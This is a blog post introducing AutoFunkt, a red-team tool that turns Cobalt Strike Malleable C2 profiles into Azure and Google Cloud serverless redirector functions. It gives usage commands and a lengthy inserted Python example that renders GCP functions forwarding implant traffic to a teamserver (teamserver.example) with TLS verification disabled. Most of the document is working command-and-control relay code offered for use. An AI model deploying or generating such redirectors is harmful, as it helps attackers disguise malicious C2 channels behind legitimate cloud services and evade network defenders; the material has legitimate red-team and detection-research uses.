Introducing AutoFunkt: Automated Cloud Redirector Generation
By Adam Rose
During recent research into C2 traffic redirection techniques, we found the process of manually editing serverless cloud function code and configuration files tedious and repetitive, so we automated it. The result is AutoFunkt, a Python script that reads a Cobalt Strike Malleable C2 profile and generates the function code for Azure and Google Cloud Platform (GCP) serverless function redirectors.
How does it work?
AutoFunkt is a Python script that takes a specified Malleable C2 profile, parses it, and then emits all the code necessary to deploy serverless redirector functions. When both the Google Cloud Platform (-g/--google) and Azure (-a/--azure) switches are provided, it creates an output directory with one subdirectory per provider.
It also prints the gcloud commands needed to deploy the generated GCP functions.
Deploying serverless functions to Azure is more involved, so we recommend using VS Code's Azure Functions extension to deploy them. We outline that process in our previous post on this subject.
This script relies heavily on the pyMalleableProfileParser (mpp) library by Brett Fitzpatrick. Many thanks!
Clone the repository from our GitHub, cd into it, and then run pip3 install -r requirements.txt.
Usage looks like this:
python3 autofunkt.py -p <path-to-malleable-profile> -t <teamserver url> -a -s <azure project subdomain> -r <azure custom-route-prefix> -o <output directory name> -g
This command generates two sets of GET and POST HTTP redirector functions, one set for Azure and one for Google Cloud. It creates two subdirectories, one per provider (the Google Cloud one is named gcp), inside a directory named with the value of the -o switch. Inside each subdirectory you'll find the code for the respective cloud functions.
If you just want to generate Google Cloud functions, use -g/--google; the same goes for Azure with -a/--azure.
There are some limitations to the tool:
- The Malleable C2 profile cannot contain more than one HTTP variant.
- Each HTTP method can have only one URI; the GET and POST URIs can (and should) be different.
- Google Cloud uses the function's name in the URL, so the value of set uri in these blocks must also be a valid Python function name (no hyphens, for example).
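To make the generation step and the limitations above concrete, here is an added Python example (it is not AutoFunkt's own code and does not use the mpp library). It parses the http-get and http-post blocks of a small, constructed profile, rejects profiles that violate the three limitations, and renders a GCP HTTP function per block that forwards each request to the teamserver. The naming rule (function name is the URI without its leading slash), the teamserver URL, the header filtering, and the verify=False setting are assumptions made for the example, not behaviour documented for the tool.

```python
"""Added example (not AutoFunkt's code, no mpp dependency): parse a profile's HTTP blocks."""
import keyword
import re

# Constructed sample profile containing only what this example needs.
SAMPLE_PROFILE = r'''
set sleeptime "30000";
http-get {
    set uri "/api_status";
    client {
        header "Accept" "*/*";
    }
}
http-post {
    set uri "/api_submit";
    set verb "POST";
}
'''
# Start of an http-get/http-post block, with an optional variant name.
BLOCK_RE = re.compile(r'\b(http-get|http-post)\b(?:\s+"([^"]+)")?\s*\{')
URI_RE = re.compile(r'\bset\s+uri\s+"([^"]+)"\s*;')

def block_body(text, open_idx):
    """Return the text between the brace at open_idx and its matching close."""
    depth = 0
    for i in range(open_idx, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[open_idx + 1:i]
    raise ValueError("unbalanced braces in profile")

def parse_profile(text):
    """Return the variant names and the URIs declared in each HTTP block."""
    uris = {"http-get": [], "http-post": []}
    variants = set()
    for m in BLOCK_RE.finditer(text):
        block, variant = m.group(1), m.group(2) or "default"
        variants.add(variant)
        for value in URI_RE.findall(block_body(text, m.end() - 1)):
            uris[block].extend(value.split())  # "set uri" may list several URIs
    return {"variants": variants, "uris": uris}

def function_name(uri):
    """Assumed naming rule: the URI without its leading slash names the function."""
    return uri.lstrip("/")

def check_limitations(parsed):
    """Return human-readable violations of the tool's documented limitations."""
    problems = []
    if len(parsed["variants"]) > 1:
        problems.append("more than one HTTP variant: %s" % sorted(parsed["variants"]))
    for block, uris in parsed["uris"].items():
        if len(uris) != 1:
            problems.append("%s must have exactly one URI, found %d" % (block, len(uris)))
        for uri in uris:
            name = function_name(uri)
            if not name.isidentifier() or keyword.iskeyword(name):
                problems.append("%s uri %r is not a valid Python function name" % (block, uri))
    if parsed["uris"]["http-get"] and parsed["uris"]["http-get"] == parsed["uris"]["http-post"]:
        problems.append("http-get and http-post must use different URIs")
    return problems

# main.py rendered for one GCP function; braces are doubled for str.format.
GCP_TEMPLATE = '''import requests

# Hop-by-hop and encoding headers must not be copied from the teamserver response.
_SKIP = {{"transfer-encoding", "content-encoding", "content-length", "connection"}}

def {name}(request):
    """HTTP-triggered Cloud Function: forward a {method} request to the teamserver."""
    resp = requests.request(
        method=request.method,
        url="{teamserver}{uri}",
        headers={{k: v for k, v in request.headers.items() if k.lower() != "host"}},
        params=list(request.args.items(multi=True)),
        data=request.get_data(),
        verify=False,  # assumption: self-signed teamserver certificate
    )
    headers = {{k: v for k, v in resp.headers.items() if k.lower() not in _SKIP}}
    return resp.content, resp.status_code, headers
'''

def generate_gcp_function(block, uri, teamserver):
    """Render the GCP function source for one http-get or http-post block."""
    method = "GET" if block == "http-get" else "POST"
    return GCP_TEMPLATE.format(name=function_name(uri), method=method,
                               teamserver=teamserver.rstrip("/"), uri=uri)

def generate_all(profile_text, teamserver):
    """Parse, validate, and return {function_name: source}; raise on any violation."""
    parsed = parse_profile(profile_text)
    problems = check_limitations(parsed)
    if problems:
        raise ValueError("; ".join(problems))
    return {function_name(uri): generate_gcp_function(block, uri, teamserver)
            for block, uris in parsed["uris"].items() for uri in uris}
```

Calling generate_all(SAMPLE_PROFILE, "https://teamserver.example") returns one main.py source per block, keyed by function name (api_status and api_submit); a profile with a hyphenated URI, several URIs in one set uri line, or a named variant raises ValueError listing every violation instead of producing a function that GCP would refuse to deploy.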
If you run into problems, feel free to open an issue on the GitHub repo.